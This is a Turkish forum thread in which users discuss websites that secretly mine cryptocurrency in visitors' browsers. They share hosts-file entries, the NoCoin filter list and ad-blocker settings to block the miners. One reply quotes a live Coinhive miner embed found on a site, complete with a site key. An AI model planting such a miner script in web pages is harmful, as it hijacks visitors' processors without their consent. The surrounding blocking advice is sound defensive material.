Jump to content
Kornsky

İşlemci Neden Yüzde Yüz Çalışıyor?

Tavsiye Edilen İletiler

Kornsky    335
Kornsky

Evet arkadaşlar pek çoğunuz ''Kripto Para Madencilik Füryası'' duymuşsunuzdur.

Bitcoin ve benzer Litecoin, PPcoin, Ripple, Feathercoin, OpenCoin, WebMoney, MintChip, Ven gibi oluşumlar. Ne işe yarar kısmına girmek istemiyorum.  

Peki bizi neden ilgilendiriyor; Son dönemde bazı siteler, sizden habersiz, sizin işlemcinizi arka planda kullanarak Coin kasıyor. Bu durum işlemcinizi %100 varan oranlara kadar kullanabiliyor.

Örnekle; Aşşağıdaki sayfada, işlemci kullanım oranı %100'ü görmektedir.

https://www.sinemia.com/sosyal/sinema-galeriler/sevdigimizi-itiraf-etmekte-zorlandigimiz-filmler

59ccf802bafae_lemci02.thumb.png.104910a15cecfb0fd36f40f76318ade9.png

Üsteki sitede arka planda çalışan coin-hive.com

Spoiler

Coinhive.thumb.jpg.50935c8508ce8b7a91d2e4d7f58eef25.jpg

Nasıl bir çözüm izleyebiliriz. Öncelikle windows host dosyasından engelleyebiliriz.

Spoiler

Engellenecek olan adresler.

0.0.0.0 cnhv.co
0.0.0.0 coin-hive.com
0.0.0.0 gus.host
0.0.0.0 load.jsecoin.com
0.0.0.0 miner.pr0gramm.com
0.0.0.0 minemytraffic.com

Chrome kullanıcıları için MinerBlock uzantısı ile engelleyebilir. 

Diğer kullanıcılar ublock eklentisi ile engelleyebilir. Aşşağıdaki linki ayarlar sekmesinden Süzgeçlerim bölümüne ekleyerek çözüm sağlayabilir.

https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/nocoin.txt

59ccfc75894fe_lemci01.thumb.png.cf8e37eecd9fbc6a2e314cdea20b495b.png

tarihinde Kornsky tarafından düzenlendi
  • Beğeni 8
  • Teşekkür 6

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
onurali    17
onurali

Çok faydalı bir bilgi. Teşekkürler.

Reklam engelleyici olmadan verdiğiniz sayfaya girince fareyi bile oynatamıyorum.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
rjxone    9
rjxone

Teşekkürler, birkaç gün önce böyle bir şeyin yapılabildiğini öğrenmiştim. Girdiğim sitelere şüpheyle yaklaşmama neden oldu. Bu listeyi hemen ublock'a ekledim. İnternette dolaşırken CPU kullanımını takip etmek gerek artık.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
ozgun14    410
ozgun14

eline sağlık @Kornsky böyle şeylerden sayende haberimiz oluyor. :fl: 

• Beğeni 1

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
Kobalamin    109
Kobalamin

Piratebay aynı şekilde bitcoin madenciliği yapıyor. %25 CPU kullanımına sebep oluyordu. Bunu öğrendikten sonra kullanmayı bıraktım.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
Kornsky    335
Kornsky

Bu sadece buzdağının görünen kısmı; Burada  Browser üzerinden önlem aldık. Sistemize bılaşmış her hangibi miner virüsü de aynı işlemi yapacaktır. Hatta sadece CPU ile sınırlı kalmaz; GPU kullanımızı önemli ölçüde arttırır...  

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
VUR4L    66
VUR4L

@Kornsky, Onu nasıl çözebiliriz. Ücretli bir antivirüs bu işi halleder mi? Misal Avast İnternet Security falan. Gerçi o da internete girmemi engellediği için "güvenlik duvarı" bileşenini durduruyorum.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
nht.ctn    425
nht.ctn

Teşekkürler :fl:Durduk yere "vuuu"lamaya başlayan fan sesleri bunlarla ilgiliymiş demek.

12 minutes ago, Kornsky said:

Bu sadece buzdağının görünen kısmı;

Engelleme yöntemlerini denemeden önce yer imlerimi karıştırıp birkaç güvenmediğim siteyi açtım. İçlerinden birinin cpu'yu köklediğini farkettim. Sonra Ublock'a süzgeç ekledim. Bunun ardından örnek verdiğin sinemia'daki cpu artışını engelledi ancak benim yer imlerimde bulduğum sitedekini etkilemedi. Engellenmesi gereken başka kaynaklarda var herhalde.

Bahsettiğim site şu: https://soundpark.world/

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
SunGod    277
SunGod
nht.ctn, 12 dk önce tarihinde yazdı:

Teşekkürler :fl:Durduk yere "vuuu"lamaya başlayan fan sesleri bunlarla ilgiliymiş demek.

Engelleme yöntemlerini denemeden önce yer imlerimi karıştırıp birkaç güvenmediğim siteyi açtım. İçlerinden birinin cpu'yu köklediğini farkettim. Sonra Ublock'a süzgeç ekledim. Bunun ardından örnek verdiğin sinemia'daki cpu artışını engelledi ancak benim yer imlerimde bulduğum sitedekini etkilemedi. Engellenmesi gereken başka kaynaklarda var herhalde.

Bahsettiğim site şu: https://soundpark.world/

Adguard programını kullanıyorum. Oraya filtre olarak eklemiştim. soundpark sitesindeki scripti otomatik engelledi. Ekledikten sonra filtre seçili halde olmayabilir.

Alıntı

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('xhNGoAK4HP7jHMunKkBbBy3gRIWkz11X'); miner.start(); </script>

Edit: Bu linki doğrudan filtre olarak ekleyin mutlaka, dünden beri güncellenmiş:

https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/nocoin.txt

! Description: This filter disables browser based miners such as coin-hive
!-------------------------------------------------------------------------------
! Title: NoCoin Filter List
! Expires: 2 days (update frequency)
! Version: 2
! Last modified: 29 Sep 2017
! Homepage: https://github.com/hoshsadiq/adblock-nocoin-list/
! Contribute: https://github.com/hoshsadiq/adblock-nocoin-list/issues
! License: https://mit-license.org/
!-------------------------------------------------------------------------------
||cnhv.co^$third-party
||coin-hive.com^$third-party
||coinhive.com^$third-party
||gus.host/coins.js
||jsecoin.com^$third-party
||miner.pr0gramm.com^$third-party
||miner.pr0gramm.com^$websocket
||miner.pr0gramm.com/cryptonight-worker.js
||minemytraffic.com^$third-party
||goodolddownloads.com/js/dolladollabillz.js
tarihinde SunGod tarafından düzenlendi

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
nht.ctn    425
nht.ctn

Daha önce Sinemia'yı engellediği için filtrenin çalıştığını farz ediyorum. Yolladığınız kodu da sona eklemeyi denedim ve ilginçtir bundan sonra engellemeye başladı. :good:
Teşekkürler.

Düzenlemeyi şimdi gördüm. Bundanmış demek. Teşekkür ederim tekrar.

tarihinde nht.ctn tarafından düzenlendi

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
SunGod    277
SunGod
Kobalamin, 3 sa önce tarihinde yazdı:

Piratebay aynı şekilde bitcoin madenciliği yapıyor. %25 CPU kullanımına sebep oluyordu. Bunu öğrendikten sonra kullanmayı bıraktım.

Bu scriptlerde cpunun ne kadarını kullanılacağına dair bir ayar oluyormuş. Bazısı düşük tutuyor, anlaşılmasın diye. Bazısı da yukarıdaki iki site gibi tamamını kullandırıyor. Dün sinemia sitesinde sayfa yüklenirken izin istiyordu, şimdi o uyarıyı çıkartamadım... Diğer ikinci örnekteki gibi doğrudan kullanmaya başladı.

tarihinde SunGod tarafından düzenlendi

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
Kornsky    335
Kornsky

@nht.ctn; Tarayıcılar'da miner çılğınlığından kurtulmak için güncel tutmak gerekiyor. Blacklisti güncel tutmaktansa Adguard programını da kullanabilirsin. Genel olarak doğrudan host olarak engellemek daha makul ama virüs yolu ile çalışanlar  host dosyasında da değişiklik yapıyor. @SunGod hocam eline sağlık.

@VUR4L antivirüs progralamın yakaladıkları var ama hiç biri %100  sonuç vermez.  Koruma kısmına gerelecek olursak; Bitdefender ile Kaspersky antivirüsleri ve bunların dışında Anti - Malware yazılımı kullanmanızı önerebilirim.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
DaMieN    38
DaMieN

Avistaz da mining işine girmiş. Açılışta üstte bir bar ile olayı anlatıp bonus ratio kazanabileceğimizi anlatıyor. Fakat isteğe bağlı elbette. Ben sayfaya girer girmez kaspersky uyarı verdi ve engelledi. Bilginize...

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
byesiler    451
byesiler

Şu mining işini hala mantıklı bulamıyorum. Nereye kadar gidecek başımıza ne belalar açacak bir cevabımda yok. İnternete bağlanmayan bir alet yok. Telefon, pc zaten bir organımız gibi. Var bir kötü sonu ama bekleyip görelim.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
setcom_2000    1
setcom_2000

Bilgilendirme için teşekkürler. Firefox'ta AdBlock Plus kullanıyorum. Listeye nasıl ekleyeceğimi bulamadım. Yardımcı olabilir misiniz?

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
cypress    91
cypress

Gerçekten faydalı bilgiler olmuş ellerine sağlık teşekkürler @Kornsky :good::flowers: 

Evde pc yi fazla açamıyorum ama en kısa zamanda eklenti olayını yapayım zaten pc eski bir de bu siteler yüzünden sorun yaşamayayım :)

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
freeseatr    107
freeseatr
setcom_2000, 11 dk önce tarihinde yazdı:

Bilgilendirme için teşekkürler. Firefox'ta AdBlock Plus kullanıyorum. Listeye nasıl ekleyeceğimi bulamadım. Yardımcı olabilir misiniz?

Süzgeç Tercihleri'ne girin sonrası kolay.

1.PNG

2.PNG

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş
setcom_2000    1
setcom_2000

Gösterdiğiniz gibi yaptım ve oldu. Teşekkür ederim.

İletiyi paylaş

Bağlantıyı ilet
Sitelerde Paylaş

Yorum yazmak için hesap oluşturun veya oturum açın

Yorum yapmak için üye olmanız gerekiyor

Hesap oluştur

Hesap oluşturmak ve bize katılmak çok kolay.

Hesap Oluştur

Giriş yap

Zaten bir hesabınız var mı? Buradan giriş yapın.

Giriş Yap

• Konuyu Görüntüleyenler   0 kullanıcı

Sayfayı görüntüleyen kayıtlı kullanıcı bulunmuyor.